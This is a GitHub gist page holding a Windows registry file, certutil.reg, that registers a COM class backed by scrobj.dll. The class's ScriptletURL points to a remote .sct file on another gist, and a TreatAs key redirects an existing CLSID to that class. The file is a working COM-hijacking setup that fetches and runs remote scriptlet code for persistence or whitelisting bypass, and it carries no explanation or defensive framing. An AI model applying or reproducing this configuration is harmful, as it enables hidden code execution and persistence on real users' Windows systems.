Skip to content

Instantly share code, notes, and snippets.

@sinmygit
Created September 21, 2017 02:19

Revisions

  1. @secdev02 secdev02 created this gist Jul 23, 2017.
    23 changes: 23 additions & 0 deletions certutil.reg
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,23 @@
    Windows Registry Editor Version 5.00
    [HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00]
    @="Bandit"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit.1.00\CLSID]
    @="{00000001-0000-0000-0000-0000FEEDACDC}"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit]
    @="Bandit"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\Bandit\CLSID]
    @="{00000001-0000-0000-0000-0000FEEDACDC}"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
    @="Bandit"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
    @="C:\\WINDOWS\\system32\\scrobj.dll"
    "ThreadingModel"="Apartment"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
    @="Bandit.1.00"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
    @="https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
    @="Bandit"
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
    [HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
    @="{00000001-0000-0000-0000-0000FEEDACDC}"